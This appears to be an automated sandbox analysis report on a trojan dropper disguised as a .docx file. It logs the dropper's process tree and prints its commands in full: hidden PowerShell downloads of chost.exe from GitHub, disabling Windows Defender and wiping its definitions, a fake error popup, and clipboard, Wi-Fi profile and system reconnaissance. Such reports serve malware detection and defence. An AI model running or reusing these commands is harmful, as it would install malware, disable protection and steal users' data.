                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF701906017_2_00007FFDF7019060
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF706926017_2_00007FFDF7069260
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF707221017_2_00007FFDF7072210
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70CD03017_2_00007FFDF70CD030
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70D4D9017_2_00007FFDF70D4D90
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF7069CB017_2_00007FFDF7069CB0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70B079017_2_00007FFDF70B0790
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF705480017_2_00007FFDF7054800
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF705A85017_2_00007FFDF705A850
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70AB67017_2_00007FFDF70AB670
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70AE74017_2_00007FFDF70AE740
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF707456017_2_00007FFDF7074560
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70815A017_2_00007FFDF70815A0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF707E5A017_2_00007FFDF707E5A0
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF706360017_2_00007FFDF7063600
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: 17_2_00007FFDF70F563017_2_00007FFDF70F5630
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9388407025_2_00007FFD93884070
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 79_2_00007FFD96381FFD79_2_00007FFD96381FFD
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF705A490 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF6A41325 appears 518 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF6ABD425 appears 48 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF6ABD341 appears 1192 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FF694362710 appears 104 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF6ABD32F appears 324 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF6ABD33B appears 39 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF6ABDB03 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FF694362910 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeCode function: String function: 00007FFDF7059330 appears 40 times
                    Source: rar.exe.16.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: unicodedata.pyd.16.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: api-ms-win-core-file-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l1-2-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-handle-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-heap-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-1.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-filesystem-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-debug-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-memory-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-profile-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-string-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-errorhandling-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-heap-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-string-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-2-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-sysinfo-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-runtime-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-datetime-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-namedpipe-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-timezone-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-stdio-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-synch-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processenvironment-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-interlocked-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-libraryloader-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-math-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-console-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-process-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-localization-l1-2-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-file-l2-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-utility-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-util-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-core-processthreads-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-time-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-environment-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-convert-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-locale-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: api-ms-win-crt-conio-l1-1-0.dll.16.drStatic PE information: No import functions for PE file found
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: Cooperative Agreement0000800380.docx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: Commandline size = 3647
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: Commandline size = 3647Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                    Source: libcrypto-3.dll.16.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
                    Source: libssl-3.dll.16.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
                    Source: python312.dll.16.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993225025765606
                    Source: sqlite3.dll.16.drStatic PE information: Section: UPX1 ZLIB complexity 0.9973947832661291
                    Source: unicodedata.pyd.16.drStatic PE information: Section: UPX1 ZLIB complexity 0.9935825892857143
                    Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@188/104@6/5
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeCode function: 0_2_004026B8 LoadResource,SizeofResource,FreeResource,0_2_004026B8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2336:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeMutant created: \Sessions\1\BaseNamedObjects\6
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile created: C:\Users\user\AppData\Local\Temp\4713.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: chost.exe, 00000011.00000003.2367561514.0000016E177B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: Cooperative Agreement0000800380.docx.exeReversingLabs: Detection: 28%
                    Source: chost.exeString found in binary or memory: set-addPolicy
                    Source: chost.exeString found in binary or memory: id-cmc-addExtensions
                    Source: unknownProcess created: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exe
                    Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()""
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
